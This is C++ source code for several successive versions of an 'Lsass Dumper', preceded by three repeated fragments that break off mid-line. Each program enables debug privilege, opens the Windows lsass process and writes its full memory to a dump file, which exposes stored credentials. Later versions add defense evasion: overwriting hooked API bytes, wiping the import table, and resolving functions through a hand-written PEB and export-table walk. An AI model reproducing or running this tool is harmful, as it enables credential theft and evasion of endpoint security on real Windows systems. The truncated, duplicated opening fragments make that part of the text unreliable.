using namespace std;
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege.\n");
return FALSE;
}
return TRUE;
}
void EnableDebugPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrent">
using namespace std;
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege.\n");
return FALSE;
}
return TRUE;
}
void EnableDebugPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrent">
using namespace std;
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege.\n");
return FALSE;
}
return TRUE;
}
void EnableDebugPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrent">
#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <string.h>
#include <DbgHelp.h>
#pragma comment(lib,"DbgHelp.lib")
#include <iostream>
using namespace std;
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("LookupPrivilegeValue error: %u\\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %u\\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege.\\n");
return FALSE;
}
return TRUE;
}
void EnableDebugPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
EnablePrivilege(hToken, SE_DEBUG_NAME, TRUE);
CloseHandle(hToken);
}
else
{
printf("Failed to open process token: %d\\n", GetLastError());
}
}
int main()
{
printf("Lsass Dumper\\n");
printf("[*] Elevating Privs\\n");
EnableDebugPrivilege();
DWORD PID;
printf("[!] Please Enter lsass Process ID\\n");
cin >> PID;
HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, PID);
if (!hProcess)
{
printf("[-] Faild To Get Handle To lsass Process Closed With Error %d\\n", GetLastError());
}
else
{
printf("[+] Successfully Opened The lsass Porcess For Handle Duplication\\n");
}
HANDLE hEvent = CreateEvent(nullptr, TRUE, FALSE, nullptr);
HANDLE hTarget;
if(DuplicateHandle(GetCurrentProcess(), hEvent, hProcess, &hTarget, 0, FALSE, DUPLICATE_SAME_ACCESS))
{
printf("[+] Successfully Duplicated The Handle To The lsass Process\\n");
}
else
{
printf("[-] Faild To Duplicate Handle To lsass Process Closed With Error %d\\n", GetLastError());
}
HANDLE DumpFile = CreateFileA("lsass.dmp", GENERIC_ALL, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (!DumpFile)
{
printf("[-] Failed Creating The Dump File Closed With Error %d\\n",GetLastError());
}
else
{
printf("[+] Successfully Created Dump File\\n");
}
BOOL Dumper = MiniDumpWriteDump(hTarget, PID, DumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
if (!Dumper)
{
printf("[-] Failed To Dump lsass Process Closed With Error %d", GetLastError());
}
else
{
printf("[+] Successfully Dumped The lsass Process");
}
}
#include <windows.h>
#include <dbghelp.h>
#include <iostream>
#pragma comment(lib, "DbgHelp.lib")
using namespace std;
typedef BOOL(WINAPI* pMiniDumpWriteDump)(
HANDLE hProcess, DWORD ProcessId, HANDLE hFile, MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
typedef HANDLE(WINAPI* pOpenProcess)(
DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
void UnhookAPI(LPCSTR moduleName, LPCSTR functionName, void** originalFunc)
{
HMODULE hModule = LoadLibraryA(moduleName);
if (!hModule)
{
printf("[-] Failed to load module: %s. Error: %u\\n", moduleName, GetLastError());
return;
}
FARPROC cleanFunc = GetProcAddress(hModule, functionName);
if (!cleanFunc)
{
printf("[-] Failed to resolve function: %s. Error: %u\\n", functionName, GetLastError());
return;
}
DWORD oldProtect;
if (!VirtualProtect((LPVOID)*originalFunc, 8, PAGE_EXECUTE_READWRITE, &oldProtect))
{
printf("[-] Failed to change memory protection. Error: %u\\n", GetLastError());
return;
}
memcpy((void*)*originalFunc, cleanFunc, 8);
if (!VirtualProtect((LPVOID)*originalFunc, 8, oldProtect, &oldProtect))
{
printf("[-] Failed to restore memory protection. Error: %u\\n", GetLastError());
return;
}
printf("[+] Unhooked function: %s\\n", functionName);
}
int main()
{
printf("Lsass Dumper\\n");
HMODULE hDbgHelp = LoadLibraryA("DbgHelp.dll");
HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
if (!hDbgHelp || !hKernel32)
{
printf("[-] Failed to load necessary libraries. Error: %u\\n", GetLastError());
return 1;
}
pMiniDumpWriteDump MiniDumpWriteDump = (pMiniDumpWriteDump)GetProcAddress(hDbgHelp, "MiniDumpWriteDump");
if (!MiniDumpWriteDump)
{
printf("[-] Failed to resolve MiniDumpWriteDump. Error: %u\\n", GetLastError());
return 1;
}
pOpenProcess OpenProcess = (pOpenProcess)GetProcAddress(hKernel32, "OpenProcess");
if (!OpenProcess)
{
printf("[-] Failed to resolve OpenProcess. Error: %u\\n", GetLastError());
return 1;
}
UnhookAPI("DbgHelp.dll", "MiniDumpWriteDump", (void**)&MiniDumpWriteDump);
UnhookAPI("kernel32.dll", "OpenProcess", (void**)&OpenProcess);
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
printf("[+] Debug privilege enabled\\n");
}
CloseHandle(hToken);
}
DWORD PID;
printf("[!] Enter lsass process ID: ");
cin >> PID;
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, FALSE, PID);
if (!hProcess)
{
printf("[-] Failed to open lsass process. Error: %u\\n", GetLastError());
return 1;
}
printf("[+] Opened lsass process\\n");
HANDLE hDumpFile = CreateFileA("lsass.dmp", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to create dump file. Error: %u\\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
printf("[+] Created dump file\\n");
if (!MiniDumpWriteDump(hProcess, PID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL))
{
printf("[-] Failed to dump lsass process. Error: %u\\n", GetLastError());
}
else
{
printf("[+] Successfully dumped lsass process\\n");
}
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 0;
}
#include <windows.h>
#include <dbghelp.h>
#include <iostream>
#pragma comment(lib, "DbgHelp.lib")
using namespace std;
typedef BOOL(WINAPI* pMiniDumpWriteDump)(
HANDLE hProcess, DWORD ProcessId, HANDLE hFile, MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
typedef HANDLE(WINAPI* pOpenProcess)(
DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
typedef HANDLE(WINAPI* pCreateFile)(
LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL(WINAPI* pLookupPrivilegeValue)(
LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
typedef BOOL(WINAPI* pAdjustTokenPrivileges)(
HANDLE TokenHandle, BOOL DisableAllPrivileges,
PTOKEN_PRIVILEGES NewState, DWORD BufferLength,
PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
typedef BOOL(WINAPI* pOpenProcessToken)(
HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
HANDLE SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN SpareBool;
HANDLE Mutant;
PVOID ImageBaseAddress;
PPEB_LDR_DATA Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PVOID AtlThunkSListPtr;
PVOID SparePtr2;
ULONG EnvironmentUpdateCount;
PVOID KernelCallbackTable;
ULONG SystemReserved[1];
ULONG ExecuteOptions : 2;
ULONG SpareBits : 30;
PPEB_LDR_DATA LdrData;
} PEB, * PPEB;
HMODULE CustomGetModuleHandle(LPCSTR moduleName)
{
PPEB peb = (PPEB)__readgsqword(0x60);
PPEB_LDR_DATA ldr = peb->Ldr;
for (PLIST_ENTRY listEntry = ldr->InMemoryOrderModuleList.Flink;
listEntry != &ldr->InMemoryOrderModuleList;
listEntry = listEntry->Flink)
{
PLDR_DATA_TABLE_ENTRY moduleEntry = CONTAINING_RECORD(listEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (_stricmp((char*)moduleEntry->BaseDllName.Buffer, moduleName) == 0)
{
return (HMODULE)moduleEntry->DllBase;
}
}
return NULL;
}
FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR functionName)
{
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
PIMAGE_EXPORT_DIRECTORY exportDir = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
DWORD* names = (DWORD*)((BYTE*)hModule + exportDir->AddressOfNames);
WORD* ordinals = (WORD*)((BYTE*)hModule + exportDir->AddressOfNameOrdinals);
DWORD* functions = (DWORD*)((BYTE*)hModule + exportDir->AddressOfFunctions);
for (DWORD i = 0; i < exportDir->NumberOfNames; i++)
{
char* name = (char*)((BYTE*)hModule + names[i]);
if (_stricmp(name, functionName) == 0)
{
return (FARPROC)((BYTE*)hModule + functions[ordinals[i]]);
}
}
return NULL;
}
void HideIAT()
{
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)dosHeader + dosHeader->e_lfanew);
PIMAGE_IMPORT_DESCRIPTOR importDesc = (PIMAGE_IMPORT_DESCRIPTOR)((BYTE*)dosHeader +
ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
while (importDesc->Name)
{
PIMAGE_THUNK_DATA thunk = (PIMAGE_THUNK_DATA)((BYTE*)dosHeader + importDesc->FirstThunk);
while (thunk->u1.Function)
{
DWORD oldProtect;
VirtualProtect((LPVOID)&thunk->u1.Function, sizeof(LPVOID), PAGE_EXECUTE_READWRITE, &oldProtect);
memset((void*)&thunk->u1.Function, 0, sizeof(LPVOID)); // Clear the function address
VirtualProtect((LPVOID)&thunk->u1.Function, sizeof(LPVOID), oldProtect, &oldProtect);
thunk++;
}
importDesc++;
}
printf("[+] IAT entries hidden.\\n");
}
int main()
{
printf("Lsass Dumper\\n");
// Hide the IAT
HideIAT();
// Dynamically resolve and unhook APIs
HMODULE hKernel32 = CustomGetModuleHandle("kernel32.dll");
HMODULE hDbgHelp = CustomGetModuleHandle("DbgHelp.dll");
HMODULE hAdvapi32 = CustomGetModuleHandle("Advapi32.dll");
if (!hKernel32 || !hDbgHelp || !hAdvapi32)
{
printf("[-] Failed to load necessary libraries. Error: %u\\n", GetLastError());
return 1;
}
// Resolve APIs dynamically
pMiniDumpWriteDump MiniDumpWriteDump = (pMiniDumpWriteDump)CustomGetProcAddress(hDbgHelp, "MiniDumpWriteDump");
pOpenProcess OpenProcess = (pOpenProcess)CustomGetProcAddress(hKernel32, "OpenProcess");
pCreateFile CreateFile = (pCreateFile)CustomGetProcAddress(hKernel32, "CreateFileA");
pOpenProcessToken OpenProcessToken = (pOpenProcessToken)CustomGetProcAddress(hAdvapi32, "OpenProcessToken");
pLookupPrivilegeValue LookupPrivilegeValue = (pLookupPrivilegeValue)CustomGetProcAddress(hAdvapi32, "LookupPrivilegeValueA");
pAdjustTokenPrivileges AdjustTokenPrivileges = (pAdjustTokenPrivileges)CustomGetProcAddress(hAdvapi32, "AdjustTokenPrivileges");
if (!MiniDumpWriteDump || !OpenProcess || !CreateFile || !OpenProcessToken ||
!LookupPrivilegeValue || !AdjustTokenPrivileges)
{
printf("[-] Failed to resolve necessary APIs. Exiting...\\n");
return 1;
}
printf("[+] APIs resolved dynamically.\\n");
// Get lsass process ID
DWORD PID;
printf("[!] Enter lsass process ID: ");
cin >> PID;
// Open the lsass process
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, PID);
if (!hProcess)
{
printf("[-] Failed to open lsass process. Error: %u\\n", GetLastError());
return 1;
}
printf("[+] Opened lsass process.\\n");
// Create dump file
HANDLE hDumpFile = CreateFile("lsass.dmp", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to create dump file. Error: %u\\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
printf("[+] Created dump file.\\n");
// Dump the process memory
if (!MiniDumpWriteDump(hProcess, PID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL))
{
printf("[-] Failed to dump lsass process. Error: %u\\n", GetLastError());
}
else
{
printf("[+] Successfully dumped lsass process.\\n");
}
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 0;
}
#include <windows.h>
#include <dbghelp.h>
#include <iostream>
#pragma comment(lib, "DbgHelp.lib")
#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
using namespace std;
typedef BOOL(WINAPI* pMiniDumpWriteDump)(
HANDLE hProcess, DWORD ProcessId, HANDLE hFile, MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam);
typedef HANDLE(WINAPI* pOpenProcess)(
DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
typedef HANDLE(WINAPI* pCreateFile)(
LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
typedef BOOL(WINAPI* pLookupPrivilegeValue)(
LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
typedef BOOL(WINAPI* pAdjustTokenPrivileges)(
HANDLE TokenHandle, BOOL DisableAllPrivileges,
PTOKEN_PRIVILEGES NewState, DWORD BufferLength,
PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
typedef BOOL(WINAPI* pOpenProcessToken)(
HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
struct PEB_LDR_DATA
{
ULONG Length;
BOOLEAN Initialized;
HANDLE SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
BOOLEAN ShutdownInProgress;
HANDLE ShutdownThreadId;
};
struct PEB
{
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN IsPackagedProcess : 1;
BOOLEAN IsAppContainer : 1;
BOOLEAN IsProtectedProcessLight : 1;
BOOLEAN SpareBits : 1;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PEB_LDR_DATA* Ldr;
};
struct UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWCH Buffer;
};
struct LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
union
{
LIST_ENTRY InInitializationOrderLinks;
LIST_ENTRY InProgressLinks;
};
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
};
typedef HMODULE(WINAPI* LoadLibrary_t)(LPCSTR lpFileName);
LoadLibrary_t pLoadLibraryA = NULL;
HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) {
#ifdef _M_IX86
PEB* ProcEnvBlk = (PEB*)__readfsdword(0x30);
#else
PEB* ProcEnvBlk = (PEB*)__readgsqword(0x60);
#endif
if (sModuleName == NULL)
return (HMODULE)(ProcEnvBlk->ImageBaseAddress);
PEB_LDR_DATA* Ldr = ProcEnvBlk->Ldr;
LIST_ENTRY* ModuleList = NULL;
ModuleList = &Ldr->InMemoryOrderModuleList;
LIST_ENTRY* pStartListEntry = ModuleList->Flink;
for (LIST_ENTRY* pListEntry = pStartListEntry; // start from beginning of InMemoryOrderModuleList
pListEntry != ModuleList; // walk all list entries
pListEntry = pListEntry->Flink) {
// get current Data Table Entry
LDR_DATA_TABLE_ENTRY* pEntry = (LDR_DATA_TABLE_ENTRY*)((BYTE*)pListEntry - sizeof(LIST_ENTRY));
// check if module is found and return its base address
if (lstrcmpiW(pEntry->BaseDllName.Buffer, sModuleName) == 0)
return (HMODULE)pEntry->DllBase;
}
// otherwise:
return NULL;
}
FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char* sProcName) {
char* pBaseAddr = (char*)hMod;
// get pointers to main headers/structures
IMAGE_DOS_HEADER* pDosHdr = (IMAGE_DOS_HEADER*)pBaseAddr;
IMAGE_NT_HEADERS* pNTHdr = (IMAGE_NT_HEADERS*)(pBaseAddr + pDosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER* pOptionalHdr = &pNTHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY* pExportDataDir = (IMAGE_DATA_DIRECTORY*)(&pOptionalHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
IMAGE_EXPORT_DIRECTORY* pExportDirAddr = (IMAGE_EXPORT_DIRECTORY*)(pBaseAddr + pExportDataDir->VirtualAddress);
// resolve addresses to Export Address Table, table of function names and "table of ordinals"
DWORD* pEAT = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfFunctions);
DWORD* pFuncNameTbl = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfNames);
WORD* pHintsTbl = (WORD*)(pBaseAddr + pExportDirAddr->AddressOfNameOrdinals);
// function address we're looking for
void* pProcAddr = NULL;
// resolve function by ordinal
if (((DWORD_PTR)sProcName >> 16) == 0) {
WORD ordinal = (WORD)sProcName & 0xFFFF; // convert to WORD
DWORD Base = pExportDirAddr->Base; // first ordinal number
// check if ordinal is not out of scope
if (ordinal < Base || ordinal >= Base + pExportDirAddr->NumberOfFunctions)
return NULL;
// get the function virtual address = RVA + BaseAddr
pProcAddr = (FARPROC)(pBaseAddr + (DWORD_PTR)pEAT[ordinal - Base]);
}
// resolve function by name
else {
// parse through table of function names
for (DWORD i = 0; i < pExportDirAddr->NumberOfNames; i++) {
char* sTmpFuncName = (char*)pBaseAddr + (DWORD_PTR)pFuncNameTbl[i];
if (strcmp(sProcName, sTmpFuncName) == 0) {
// found, get the function virtual address = RVA + BaseAddr
pProcAddr = (FARPROC)(pBaseAddr + (DWORD_PTR)pEAT[pHintsTbl[i]]);
break;
}
}
}
// check if found VA is forwarded to external library.function
if ((char*)pProcAddr >= (char*)pExportDirAddr &&
(char*)pProcAddr < (char*)(pExportDirAddr + pExportDataDir->Size)) {
char* sFwdDLL = _strdup((char*)pProcAddr); // get a copy of library.function string
if (!sFwdDLL) return NULL;
// get external function name
char* sFwdFunction = strchr(sFwdDLL, '.');
*sFwdFunction = 0; // set trailing null byte for external library name -> library\\x0function
sFwdFunction++; // shift a pointer to the beginning of function name
// resolve LoadLibrary function pointer, keep it as global variable
if (pLoadLibraryA == NULL) {
pLoadLibraryA = (LoadLibrary_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "LoadLibraryA");
if (pLoadLibraryA == NULL) return NULL;
}
// load the external library
HMODULE hFwd = pLoadLibraryA(sFwdDLL);
free(sFwdDLL); // release the allocated memory for lib.func string copy
if (!hFwd) return NULL;
// get the address of function the original call is forwarded to
pProcAddr = hlpGetProcAddress(hFwd, sFwdFunction);
}
return (FARPROC)pProcAddr;
}
BOOL EnablePrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
printf("LookupPrivilegeValue error: %u\\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %u\\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("The token does not have the specified privilege.\\n");
return FALSE;
}
return TRUE;
}
void EnableDebugPrivilege()
{
HANDLE hToken;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
EnablePrivilege(hToken, SE_DEBUG_NAME, TRUE);
CloseHandle(hToken);
}
else
{
printf("Failed to open process token: %d\\n", GetLastError());
}
}
int main()
{
printf("Lsass Dumper\\n");
// Enable Debug Privileges
EnableDebugPrivilege();
// Resolve APIs dynamically
pMiniDumpWriteDump MiniDumpWriteDump = (pMiniDumpWriteDump)hlpGetProcAddress(hlpGetModuleHandle(L"DbgHelp.dll"), "MiniDumpWriteDump");
pOpenProcess OpenProcess = (pOpenProcess)hlpGetProcAddress(hlpGetModuleHandle(L"kernel32.dll"), "OpenProcess");
pCreateFile CreateFile = (pCreateFile)hlpGetProcAddress(hlpGetModuleHandle(L"kernel32.dll"), "CreateFileA");
if (!MiniDumpWriteDump || !OpenProcess || !CreateFile)
{
printf("[-] Failed to resolve necessary APIs. Exiting...\\n");
return 1;
}
printf("[+] APIs resolved successfully.\\n");
// Get lsass process ID
DWORD PID;
printf("[!] Enter lsass process ID: ");
cin >> PID;
// Open the lsass process
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, PID);
if (!hProcess)
{
printf("[-] Failed to open lsass process. Error: %u\\n", GetLastError());
return 1;
}
printf("[+] Opened lsass process.\\n");
// Create dump file
HANDLE hDumpFile = CreateFile("lsass.dmp", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDumpFile == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to create dump file. Error: %u\\n", GetLastError());
CloseHandle(hProcess);
return 1;
}
printf("[+] Created dump file.\\n");
// Dump the process memory
if (!MiniDumpWriteDump(hProcess, PID, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL))
{
printf("[-] Failed to dump lsass process. Error: %u\\n", GetLastError());
}
else
{
printf("[+] Successfully dumped lsass process.\\n");
}
CloseHandle(hDumpFile);
CloseHandle(hProcess);
return 0;
}